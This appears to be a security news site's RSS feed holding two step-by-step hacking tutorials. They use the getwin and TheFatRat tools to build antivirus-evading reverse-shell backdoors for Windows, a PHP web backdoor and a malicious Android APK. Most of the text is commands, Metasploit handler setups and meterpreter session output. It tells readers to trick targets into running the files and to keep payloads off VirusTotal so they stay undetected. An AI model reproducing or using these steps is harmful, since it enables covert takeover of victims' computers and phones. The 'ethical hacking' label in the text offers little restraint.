Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ Information Security Newspaper|Infosec Articles|Hacking News Sun, 01 Aug 2021 17:53:39 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.1 https://www.securitynewspaper.com/snews-up/2018/12/news5.png Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ 32 32 Create Windows 10 FUD (Fully Undetectable) payload https://www.securitynewspaper.com/2019/06/20/create-windows-10-fud-fully-undetectable-payload/ Thu, 20 Jun 2019 16:44:42 +0000 https://www.securitynewspaper.com/?p=15550 Windows shell is what, every hacker loves. There are various Windows payloads are designed to bypass Windows OS security mechanism. According to ethical hacking researcher of international institute of cyberRead More →

The post Create Windows 10 FUD (Fully Undetectable) payload appeared first on Information Security Newspaper | Hacking News.

]]>
Windows shell is what, every hacker loves. There are various Windows payloads are designed to bypass Windows OS security mechanism. According to ethical hacking researcher of international institute of cyber security these payloads are well coded to get sessions of Windows OS. There are many different ways of getting reverse shell. Today we will show getwin tool used to create Win32 payload and listener.

Payload generated by this tool is FUD (fully undetectable) by Windows 10 Defender. Do Not Upload the payload generated on virustotal.com.

The tool does not need any configuration, no need to configure port forwarding or install other programs. See the demonstration in below video.

  • For testing purposes, On attacker side we will use Kali Linux 2018.4 amd64 and on the Victim side we will use Windows 10 1809.
  • Open terminal type git clone https://github.com/thelinuxchoice/getwin.git
  • Then type cd getwin & type chmod u+x getwin.sh
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git
 Cloning into 'getwin'…
 remote: Enumerating objects: 46, done.
 remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46
 Unpacking objects: 100% (46/46), done.
 root@kali:/home/iicybersecurity/Downloads# cd getwin/
 root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh
 root@kali:/home/iicybersecurity/Downloads/getwin# ls
 getwin.sh  icon  LICENSE  README.md
  • Type ./getwin.sh
root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
     _______                _  _  _  _
    (_______)          _   (_)(_)(_)(_)
     _   ___  _____  _| |_  _  _  _  _  ____
    | | (_  || ___ |(_   _)| || || || ||  _ \
    | |___) || ____|  | |_ | || || || || | | |
     \_____/ |_____)   \__) \_____/ |_||_| |_|v1.2

.:.: FUD win32 payload generator and listener :.:.
        .:.: Coded by:@linux_choice :.:.

     :: Warning: Attacking targets without  ::
     :: prior mutual consent is illegal!    ::
  • After the tool has started, press enter to set default port. Then enter payload name(test01) and select the icon.
 [*] Choose a Port (Default: 4098 ):
 [*] Payload name (Default: payload ): test01
 [] Put ICON path (Default: icon/messenger.ico ): [] Compiling…
 [] Saved: test01.exe [!] Please, don't upload to virustotal.com ! [] Starting server…
 [*] Send the first link above to target + /test01.exe:
 Forwarding HTTP traffic from https://ludius.serveo.net
 Forwarding TCP connections from serveo.net:2119
 [*] Waiting connection…
 listening on [any] 1547 …
  • As you can see listener connection has started. Now you can use any social engineering trick to execute the payload in victim computer.
  • For testing we will use Windows 10 1809 with Windows Defender enabled.
  • So now we will execute the payload in Windows 10 OS.
  • After creating the payload (test01.exe). Execute the payload (test01.exe). Simply double click the executable.
  • As you double click on the payload (test01.exe). A session will be created between victim and the target machine and you will get windows shell.
  • Tools like this are the part of ethical hacking courses offered by International Institute of Cyber Security

Do Not Upload the payload generated on virustotal.com

[*] Waiting connection…
 listening on [any] 4342 …
 connect to [127.0.0.1] from localhost [127.0.0.1] 43878
 TCP connection from 27.4.174.190 on port 3352
 Microsoft Windows [Version 10.0.17758.1]
 (c) 2018 Microsoft Corporation. All rights reserved.
 E:>C:
 C:
 C:>ipconfig
 ipconfig
 Windows IP Configuration
 Ethernet adapter Ethernet0:
 Connection-specific DNS Suffix  . :
    Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13
    IPv4 Address. . . . . . . . . . . : 192.168.1.5
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : fe80::1%13
                                        192.168.1.1
C:>getmac
 getmac
 Physical Address    Transport Name
 =================== ==========================================================
 ##-##-##-E8-##-##   \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC}

(For security reasons we have hide the MAC address)
  • Now attacker can change or view any file of target’s Windows 10 computer.

The post Create Windows 10 FUD (Fully Undetectable) payload appeared first on Information Security Newspaper | Hacking News.

]]>
Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial) https://www.securitynewspaper.com/2019/01/31/hack-windows-android-mac-using-thefatrat-step-by-step-tutorial/ Thu, 31 Jan 2019 05:01:21 +0000 https://www.securitynewspaper.com/?p=14064 Using Metasploit is not an difficult thing anymore. Because there are many resources that are available over the internet. Which tells usage of metasploit. Metasploit are the common ways ofRead More →

The post Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial) appeared first on Information Security Newspaper | Hacking News.

]]>
Using Metasploit is not an difficult thing anymore. Because there are many resources that are available over the internet. Which tells usage of metasploit. Metasploit are the common ways of attacking any outdated operating system. Still there are many operating system which can be exploit remotely. And there are many anti-viruses which cannot detect these exploits, say ethical hacking professionals. We are talking about TheFatRat.

According to ethical hacking researcher of International Institute of Cyber Security did a detailed analysis on the working of TheFatRat to check on the insides of pentesting tool.

TheFatRat is an another metasploit like tool which is used to generate backdoor easily. This tool is used to compile some of the malware with some popular payloads which then can be used to attack operating systems like Windows, MAC, Linux. This tool gives many options like creating backdoors, infected dlls, as per ethical hacking investigation..

The whole tool has been tested on Parrot OS. And after creating backdoors. These backdoors has been opened on Windows 10 Build 1607 and android.

  • For cloning type https://github.com/Screetsec/TheFatRat.git
  • Then type cd TheFatRat
  • Type chmod u+x setup.sh
  • Type ./setup.sh
  • If mono does not install type sudo apt-get update and sudo apt-get install mono-mcs or type sudo apt-get install mono-devel or type sudo apt-get install mono-complete
  • As some of the dependencies related to mono does no install directly. so simply run above commands.
  • In installation phase it will ask to create shortcut in parrot OS. Simply type y  after installation you can run fatrat just like you run msfconsole.
  • After then type fatrat
  • As you can TheFatRat gives tons of options to create session in target windows or other platforms.

Creating An Simple Exploit To Hack Windows 10 :-

  • Type 6 will create fud backdoor using pwnwinds.
  • Then typewhich will create fud backdoor using c# + powershell.
  • Enter LHOST listener/attacker IP address. Type 192.168.1.12
  • Type port 4444 or any port number.
  • Enter backdoor file name tstfile
  • Type 3 for using windows/meterpreter/reverse_tcp.
  • Press enter for creating backdoor.
  • After backdoor is creating it will save in /home/user/Downloads/TheFatRat/output/tstfile.exe
  • For accessing backdoor go to above location.
  • Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
  • Type msfconsole
  • After msfconsole has started type use exploit/multi/handler
  • Then type set payload windows/meterpreter/reverse_tcp
  • Type LHOST 192.168.1.12
  • Type LPORT 4444
  • Type exploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
  • Now for opening backdoor in Windows 10. Simply copy from here and paste to pendrive and open pendrive in Windows 10. You can also use any social engineering technique (like by Fake any website in seconds) to pass this exe to TARGET computer.
  • You have to copy two files tstfile.exe and program.cs. As this backdoor has created using C#
  • And then double click on tstfile.exe
  • As target click on the file a popup will came out and then meterpreter session will be opened.
  • As shown below meterpreter session has started in msfconsole.
msf5 exploit(multi/handler) > exploit
[] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
  • The above target is using Widnows 10. As session has created attacker can perform various tasks.

Creating Backdoor easily with another option (with C code):-

  • Type 6
  • Type 6
  • Type 6
  • Enter LHOST listener/attacker IP address. Type 192.168.1.12
  • Type port 4444 or any port number.
  • Enter backdoor file name tstfile
  • Press enter to create backdoor.
  • Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
  • Type msfconsole
  • After msfconsole has started type use exploit/multi/handler
  • Then type set payload windows/meterpreter/reverse_tcp
  • Type LHOST 192.168.1.12
  • Type LPORT 4444
  • Type exploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
  • As target open malicious file (tstfile.exe) in windows 10. A meterpreter session will start.
[] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 2 opened (192.168.1.12:4444 -> 192.168.1.5:61331) at 2019-01-30 15:19:28 +0000
meterpreter >
  • As you can see meterpreter session has start in attacker machine. Now attacker can easily manipulate target.

Creating Backdoor Using Apache + Powershell :-

  • Type 6
  • Type 3

  • Enter LHOST listener/attacker IP address. Type 192.168.1.12
  • Type port 4444 or any port number.
  • Enter backdoor file name tstfile1
  • Type 3
  • Press enter to create backdoor.
  • Open above created backdoor in Windows 10. Or trick your target to open above file in their pc.
  • Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
  • Type msfconsole
  • After msfconsole has started type use exploit/multi/handler
  • Then type set payload windows/meterpreter/reverse_tcp
  • Type LHOST 192.168.1.12
  • Type LPORT 4444
  • Type exploit
  • As target opens backdoor (tstfile1.exe) a new session will be created in windows
 [] Sending stage (179779 bytes) to 192.168.1.5 [] Meterpreter session 3 opened (192.168.1.12:4444 -> 192.168.1.5:61336) at 2019-01-30 15:20:01 +0000
meterpreter >

The difference between backdoors are that 1st backdoor uses c# + powershell where you files to the target. And second backdoor where you have to simply choose the options to create backdoor. As another backdoor requires to set payload. And the third where the backdoor uses a webserver apache to create backdoor. The third backdoor makes a strong backdoor for attackers. The session does not get expired easily. As the above two expires session suddenly while testing, according to ethical hacking courses.

Inject Using PHP:-

  • Here we will create backdoor using php. Type 1
  • Then type 5
  • Type LHOST 192.168.1.7
  • Then type port 80
  • Enter file name tstfile
  • As shown in the above image. This backdoor is using windows payload for creating an session.
  • After payload has created. Move payload to apache server location. As this payload will be opened using Ip address.
  • Type cp tstfile.php /var/www/html
  • Then type sudo serivce apache2 start
  • Then go to target windows browser and type 192.168.1.7/tstfile.php
  • As target open above URL. A php script will start in background and session will start as shown below.
 
[*] Meterpreter session 1 opened (192.168.1.12:80 -> 192.168.1.5:61331) at 2019-01-30 17:45:28 +0000
Id Information Connection
------ ------------ -----------
1 meterpreter php/linux www-data (33) @apache2 192.168.1.7:80 -> 192.178.1.5:61331

msf exploit(handler) > session -i 1
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
  • After opening just a URL. Target can easily got hacked.

Attacking An Android Device :-

  • Type 1
  • Type 192.168.1.7
  • Type 4444
  • Then backdoor
  • Type 3
  • Press enter to create backdoor.
  • This is create a infected .apk file
  • We will open backdoor in android mobile. Here we have use Android 4.4 Lolipop.
  • Create an multi handler inside msfconsole.
  • Type use exploit/multi/handler
  • Type set payload android/meterpreter/reverse_tcp
  • Type set 192.168.1.7
  • Type set 4444
  • Type exploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.7
LHOST => 192.168.1.7
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
  • Install the above backdoor.apk
  • As backdoor.apk is opened in android a new session will be created in msfconsole. As per digital forensic expert from International Institute of Cyber Security users should be cautious while downloading any new Android app, as it can be android trojan.
[] Started reverse TCP handler on 192.168.1.7:4444 [] Sending stage (70554 bytes) to 192.168.1.12
[*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.12:58445) at 2019-01-31 02:04:20 +0000
meterpreter > help
Core Commands
Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel
  • Type sysinfo
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
Meterpreter : dalvik/android
meterpreter >
  • As the attacker can take advantage of target android device.

The post Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial) appeared first on Information Security Newspaper | Hacking News.

]]>